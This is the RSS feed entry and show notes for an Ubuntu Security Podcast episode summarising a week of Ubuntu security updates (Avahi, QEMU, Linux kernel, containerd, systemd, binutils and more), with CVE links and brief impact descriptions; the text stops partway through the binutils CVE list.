        <itunes:summary>  It's another week when too many security updates are never enough as we
  cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd,
  binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.
  </itunes:summary>
        <description>  It's another week when too many security updates are never enough as we
  cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd,
  binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.
  </description>
        <googleplay:description>  It's another week when too many security updates are never enough as we
  cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd,
  binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s another week when too many security updates are never enough as we
cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd,
binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>240 unique CVEs addressed</p>
<h3 id="usn-5008-1-usn-5008-2-avahi-vulnerabilities-00-36">[<a href="https://ubuntu.com/security/notices/USN-5008-1">USN-5008-1</a>, <a href="https://ubuntu.com/security/notices/USN-5008-2">USN-5008-2</a>] Avahi vulnerabilities [00:36]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3502">CVE-2021-3502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3468">CVE-2021-3468</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 DoS via local users - first via abusing the Avahi daemon&rsquo;s unix socket -&gt; hang</li>
<li>second by calling asking the avahi daemon to resolve a crafted domain
name either via the DBus API or the local socket - assert() -&gt; crash</li>
</ul>
<h3 id="usn-5006-2-php-vulnerabilities-01-12">[<a href="https://ubuntu.com/security/notices/USN-5006-2">USN-5006-2</a>] PHP vulnerabilities [01:12]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21705">CVE-2021-21705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21704">CVE-2021-21704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21702">CVE-2021-21702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7071">CVE-2020-7071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7068">CVE-2020-7068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-123/">Episode 123</a></li>
</ul>
<h3 id="usn-5009-1-libslirp-vulnerabilities-01-31">[<a href="https://ubuntu.com/security/notices/USN-5009-1">USN-5009-1</a>] libslirp vulnerabilities [01:31]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3595">CVE-2021-3595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3594">CVE-2021-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3593">CVE-2021-3593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3592">CVE-2021-3592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29130">CVE-2020-29130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29129">CVE-2020-29129</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TCP/IP emulation library using by QEMU etc</li>
<li>Info leaks from the host to the guest via buffer over-reads in handling
of various network packet types (UDP etc)</li>
</ul>
<h3 id="usn-5010-1-qemu-vulnerabilities-02-07">[<a href="https://ubuntu.com/security/notices/USN-5010-1">USN-5010-1</a>] QEMU vulnerabilities [02:07]</h3>
<ul>
<li>21 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3595">CVE-2021-3595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3594">CVE-2021-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3593">CVE-2021-3593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3592">CVE-2021-3592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3608">CVE-2021-3608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3607">CVE-2021-3607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3582">CVE-2021-3582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3546">CVE-2021-3546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3545">CVE-2021-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3544">CVE-2021-3544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3527">CVE-2021-3527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3416">CVE-2021-3416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3409">CVE-2021-3409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20257">CVE-2021-20257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20221">CVE-2021-20221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35517">CVE-2020-35517</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3392">CVE-2021-3392</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35505">CVE-2020-35505</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35504">CVE-2020-35504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29443">CVE-2020-29443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15469">CVE-2020-15469</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of vulns in emulation of various devices etc - generally allows
a malicious guest to cause QEMU to crash on the host -&gt; DoS
<ul>
<li>MMIO, ATAPI, SCSI, ARM Generic Interrupt Controller, e1000</li>
</ul>
</li>
<li>Mishandling in virtio-fs shared filesystem daemon allows malicious guest
to read/write host devices</li>
<li>A few others possibly result on code-exec on the host as the QEMU daemon
BUT on Ubuntu QEMU is confined via AppArmor by default so this limits the
possible impact</li>
</ul>
<h3 id="lsn-0078-1-linux-kernel-vulnerability-03-14">[<a href="https://ubuntu.com/security/notices/LSN-0078-1">LSN-0078-1</a>] Linux kernel vulnerability [03:14]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Livepatch for CAN BCM UAF -&gt; arbitrary code exec (<a href="https://ubuntusecuritypodcast.org/episode-121/">Episode 121</a>)</li>
</ul>
<h3 id="usn-5014-1-linux-kernel-vulnerability-03-49">[<a href="https://ubuntu.com/security/notices/USN-5014-1">USN-5014-1</a>] Linux kernel vulnerability [03:49]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>high priority respin</li>
<li>seq_file vuln - this virt file-system contained an unsigned integer
conversion error - would result in a local user being able to cause an
OOB write and hence possible code-exec in the kernel -&gt; privesc</li>
</ul>
<h3 id="usn-5015-1-linux-kernel--oem--vulnerabilities-04-28">[<a href="https://ubuntu.com/security/notices/USN-5015-1">USN-5015-1</a>] Linux kernel (OEM) vulnerabilities [04:28]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3587">CVE-2021-3587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3573">CVE-2021-3573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28691">CVE-2021-28691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.10 oem</li>
<li>seq_file vuln plus a couple UAF in bluetooth, NULL ptr deref in NFC, UAF
in Xen networking - guest to host crash/code-exec etc</li>
</ul>
<h3 id="usn-5016-1-linux-kernel-vulnerabilities-04-54">[<a href="https://ubuntu.com/security/notices/USN-5016-1">USN-5016-1</a>] Linux kernel vulnerabilities [04:54]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.8 - hirsute, focal hwe</li>
<li>seq_file vuln plus, NFC UAF, Bluetooth UAFs, F2FS OOB read</li>
</ul>
<h3 id="usn-5017-1-linux-kernel-vulnerabilities-05-26">[<a href="https://ubuntu.com/security/notices/USN-5017-1">USN-5017-1</a>] Linux kernel vulnerabilities [05:26]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-0129">CVE-2021-0129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - focal, bionic hwe, oem, aws, azure, gcp, gke etc</li>
<li>seq_file vuln plus a few bluetooth info leaks</li>
</ul>
<h3 id="usn-5018-1-linux-kernel-vulnerabilities-05-49">[<a href="https://ubuntu.com/security/notices/USN-5018-1">USN-5018-1</a>] Linux kernel vulnerabilities [05:49]</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0129">CVE-2021-0129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - bionic, xenial hwe, trusty azure</li>
<li>seq_file vuln plus various other fixes from recent kernels - eBPF
privesc, Wifi FRAGATTACKs fixes, bluetooth info leaks and UAFs and NFC
UAF</li>
</ul>
<h3 id="lsn-0079-1-linux-kernel-vulnerability-06-21">[<a href="https://ubuntu.com/security/notices/LSN-0079-1">LSN-0079-1</a>] Linux kernel vulnerability [06:21]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33909">CVE-2021-33909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3600">CVE-2021-3600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>seq_file vuln plus eBPF codeexec</li>
</ul>
<h3 id="usn-5019-1-nvidia-graphics-drivers-vulnerabilities-06-43">[<a href="https://ubuntu.com/security/notices/USN-5019-1">USN-5019-1</a>] NVIDIA graphics drivers vulnerabilities [06:43]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1095">CVE-2021-1095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1094">CVE-2021-1094</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1093">CVE-2021-1093</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 DoS - one by triggering an assert(), the other by dereferencing an
untrusted pointer - kernel crash in either case</li>
<li>OOB array access (OOB read) - info leak or crash -&gt; DoS</li>
</ul>
<h3 id="usn-5012-1-containerd-vulnerabilities-07-23">[<a href="https://ubuntu.com/security/notices/USN-5012-1">USN-5012-1</a>] containerd vulnerabilities [07:23]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32760">CVE-2021-32760</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When extracting a container image, would try and set the
owner/permissions on the resulting extracted files - if these files were
symlinks pointing to existing files on the host then would change perms
of those files instead - fixed to ensure it does not follow symlinks when
applying this permissions changes</li>
</ul>
<h3 id="usn-5013-1-usn-5013-2-systemd-vulnerabilities-08-00">[<a href="https://ubuntu.com/security/notices/USN-5013-1">USN-5013-1</a>, <a href="https://ubuntu.com/security/notices/USN-5013-2">USN-5013-2</a>] systemd vulnerabilities [08:00]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13529">CVE-2020-13529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33910">CVE-2021-33910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When parsing mount paths, would allocate memory for the path on the
stack - if a local attacker can mount a file-system with a very long path
name, would overflow the entire stack memory and cause systemd to crash -
as systemd is PID1 this effectively crashes the whole system</li>
<li>Remote attacker could cause sytemd DHCP client to force assign a
different address and hence could cause a networking DoS against a remote
server on the same network by making it unroutable etc</li>
</ul>
<h3 id="usn-4336-2-gnu-binutils-vulnerabilities-09-12">[<a href="https://ubuntu.com/security/notices/USN-4336-2">USN-4336-2</a>] GNU binutils vulnerabilities [09:12]</h3>
<ul>
<li>147 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9077">CVE-2019-9077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9075">CVE-2019-9075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9074">CVE-2019-9074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9073">CVE-2019-9073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9071">CVE-2019-9071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9070">CVE-2019-9070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17451">CVE-2019-17451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17450">CVE-2019-17450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14444">CVE-2019-14444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14250">CVE-2019-14250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12972">CVE-2019-12972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9138">CVE-2018-9138</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8945">CVE-2018-8945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7643">CVE-2018-7643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7642">CVE-2018-7642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7569">CVE-2018-7569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7568">CVE-2018-7568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7208">CVE-2018-7208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6759">CVE-2018-6759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6543">CVE-2018-6543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6323">CVE-2018-6323</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20671">CVE-2018-20671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20623">CVE-2018-20623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20002">CVE-2018-20002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19932">CVE-2018-19932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19931">CVE-2018-19931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18701">CVE-2018-18701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18700">CVE-2018-18700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18607">CVE-2018-18607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18606">CVE-2018-18606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18605">CVE-2018-18605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18484">CVE-2018-18484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18483">CVE-2018-18483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18309">CVE-2018-18309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17985">CVE-2018-17985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17794">CVE-2018-17794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17360">CVE-2018-17360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17359">CVE-2018-17359</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17358">CVE-2018-17358</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13033">CVE-2018-13033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12934">CVE-2018-12934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12700">CVE-2018-12700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12699">CVE-2018-12699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12698">CVE-2018-12698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12697">CVE-2018-12697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12641">CVE-2018-12641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10535">CVE-2018-10535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10534">CVE-2018-10534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10373">CVE-2018-10373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10372">CVE-2018-10372</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000876">CVE-2018-1000876</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9954">CVE-2017-9954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9756">CVE-2017-9756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9755">CVE-2017-9755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9754">CVE-2017-9754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9753">CVE-2017-9753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9752">CVE-2017-9752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9751">CVE-2017-9751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9750">CVE-2017-9750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9749">CVE-2017-9749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9748">CVE-2017-9748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9747">CVE-2017-9747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9746">CVE-2017-9746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9745">CVE-2017-9745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9744">CVE-2017-9744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9742">CVE-2017-9742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9044">CVE-2017-9044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9042">CVE-2017-9042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9041">CVE-2017-9041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9040">CVE-2017-9040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9039">CVE-2017-9039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9038">CVE-2017-9038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8421">CVE-2017-8421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8398">CVE-2017-8398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8397">CVE-2017-8397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8396">CVE-2017-8396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8395">CVE-2017-8395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8394">CVE-2017-8394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8393">CVE-2017-8393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7614">CVE-2017-7614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7302">CVE-2017-7302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7301">CVE-2017-7301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7300">CVE-2017-7300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7299">CVE-2017-7299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7227">CVE-2017-7227</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7226">CVE-2017-7226</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7225">CVE-2017-7225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7224">CVE-2017-7224</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7223">CVE-2017-7223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7210">CVE-2017-7210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7209">CVE-2017-7209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6969">CVE-2017-6969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6966">CVE-2017-6966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6965">CVE-2017-6965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17125">CVE-2017-17125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17124">CVE-2017-17124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17123">CVE-2017-17123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17121">CVE-2017-17121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17080">CVE-2017-17080</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16832">CVE-2017-16832</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16831">CVE-2017-16831</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16828">CVE-2017-16828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16827">CVE-2017-16827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16826">CVE-2017-16826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15996">CVE-2017-15996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15939">CVE-2017-15939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15938">CVE-2017-15938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15225">CVE-2017-15225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15025">CVE-2017-15025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15024">CVE-2017-15024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15022">CVE-2017-15022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15021">CVE-2017-15021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15020">CVE-2017-15020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14940">CVE-2017-14940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14939">CVE-2017-14939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14938">CVE-2017-14938</a> <!-- raw HTML omitted --></li>
